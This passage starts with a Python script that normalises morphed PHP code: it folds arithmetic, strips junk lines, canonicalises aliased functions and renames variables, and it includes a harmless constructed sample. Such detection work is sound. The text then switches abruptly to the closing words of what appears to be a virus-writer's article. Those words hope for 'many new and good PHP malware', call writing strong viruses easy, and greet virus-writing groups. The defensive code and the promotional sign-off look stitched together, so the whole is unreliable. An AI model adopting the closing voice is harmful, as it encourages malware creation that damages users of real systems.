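    "chop": "rtrim", "close": "closedir", "die": "exit", "doubleval": "floatval",
    "fputs": "fwrite", "ini_alter": "ini_set", "is_double": "is_float",
    "is_integer": "is_int", "is_long": "is_int", "is_real": "is_float",
    "is_writeable": "is_writable", "join": "implode", "pos": "current",
    "show_source": "highlight_file", "sizeof": "count", "strchr": "strstr",
}
RX_CALL = re.compile(r"\b(" + "|".join(CANONICAL) + r")\s*\(")
# Innermost "(int op int)" as produced by the number-changing engine.
RX_BINOP = re.compile(r"\(\s*(-?\d+)\s*([-+*/])\s*(-?\d+)\s*\)")
# Junk assignment shape from the adding-trash engine: a bare integer or a
# quoted run of lowercase letters, alone on its line.
RX_JUNK_ASSIGN = re.compile(r"^\s*\$([A-Za-z_]\w*)\s*=\s*(?:\d+|'[a-z]*')\s*;\s*$")
RX_VAR = re.compile(r"\$([A-Za-z_]\w*)")


def fold_numbers(src: str) -> str:
    """Collapse nested integer arithmetic back to the constant it hides."""
    def fold(m):
        a, op, b = int(m.group(1)), m.group(2), int(m.group(3))
        if op == "+":
            return str(a + b)
        if op == "-":
            return str(a - b)
        if op == "*":
            return str(a * b)
        if b == 0 or a % b:          # not an exact quotient: leave it alone
            return m.group(0)
        return str(a // b)
    while True:                      # repeat until no innermost pair is left
        folded = RX_BINOP.sub(fold, src)
        if folded == src:
            return src
        src = folded


def strip_junk(src: str) -> str:
    """Drop full-line // comments and junk assignments to never-reused variables."""
    counts = {}
    for name in RX_VAR.findall(src):
        counts[name] = counts.get(name, 0) + 1
    kept = []
    for line in src.splitlines():
        if line.lstrip().startswith("//"):
            continue
        m = RX_JUNK_ASSIGN.match(line)
        if m and counts.get(m.group(1), 0) == 1:
            continue
        kept.append(line)
    return "\n".join(kept)


def canonicalize_calls(src: str) -> str:
    """Rewrite aliased function calls to their canonical name."""
    return RX_CALL.sub(lambda m: CANONICAL[m.group(1)] + "(", src)


def canonicalize_variables(src: str) -> str:
    """Rename variables to $v1, $v2, ... in order of first appearance."""
    names = {}
    def rename(m):
        name = m.group(1)
        if name not in names:
            names[name] = "v%d" % (len(names) + 1)
        return "$" + names[name]
    return RX_VAR.sub(rename, src)


def normalize(src: str) -> str:
    """Apply all four passes; morphed generations converge to one text."""
    return canonicalize_variables(canonicalize_calls(strip_junk(fold_numbers(src))))


# Constructed sample: a fragment after trash, number and alias changes,
# next to the fragment it was derived from.
MORPHED = """<?php
// shsdfjksfdjfds
$kasjkh=192847832;
$size=((((1289-9)/(6+2))/((15+5)-(4+6)))-(((252/6)/(7-1))-((4+3)-(30/5))));
$lwekjcmws='iwsdkjhfskjbnla';
$data=fread($handle, $size);
fputs($out, sizeof($parts));
?>"""
ORIGINAL = """<?php
$size=10;
$data=fread($handle, $size);
fwrite($out, count($parts));
?>"""

if __name__ == "__main__":
    print(normalize(MORPHED))
    print("same after normalising:", normalize(MORPHED) == normalize(ORIGINAL))
```

A signature taken over the normalised text survives all four morphing tricks, while one taken over the raw file survives none of them.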
5) Last Words
Coming to an end I want to say that I had really much fun while discovering this language, and I also hope that you learned some things. I hope that I will see many new and good PHP malware in the near future. If I don't see any, I know that I worked 2-3 months for nothing. :)
But let's see it positively: Now it's easy to write strong viruses for this language, because the techniques are already discovered. Here at this point I want to thank MaskBits/VXI for making the first PHP malware called PHP.Pirus, which was released in 29a#5. This inspired me in writing this article, because I found out that the current PHP viruses are not at the point where you can say: "It's perfect, we can't make it better." :). Another guy I want to thank is SnakeByte, because of his articles about Perl poly/EPO/encryption in 29a#6. It helped me in some parts of this article. Greets go also to Kefi, who also wrote a PHP polymorphic virus, which I haven't seen so far. The fact that I know that made me very active in writing this article :). Now I want to send some greets and thanks out to the world, because I think that I said everything that is important:
PhileT0aster and the rest of the rRlf-gang ;), jackie for being something like an idol for me, SlageHammer & Knowdeth - the most friendly VX guys I know :), VirusBuster - for answering my stupid questions every time, Vorgon - for trying to teach me assembler :D, Toro - for helping me with many problems, SnakeByte for the great tutorials you wrote, SAD1c - for being a great guy, VorteX & Worf for being the first guys who helped in the VX world :), VxF & Metal for the great fun in IRC :), Doctor Rave for some great ideas you gave me, prizzy for the nice email you wrote, herm1t for hosting my homepage, sinocred for hating the '<SPTH> hi' :D, PanoiX for being a cool guy :), Arzy for being very helpful :D, Necronomikon & Gigabyte for cool talks in IRC (unfortunately we have nearly no contact recently) and many other cool individuals I know... :)
I also want to send out some group greets: Greets to rRlf (of course :D), 29A, iKx, SLAM, TKT, MIONS, Whackerz and every other more or less active virus-writing group!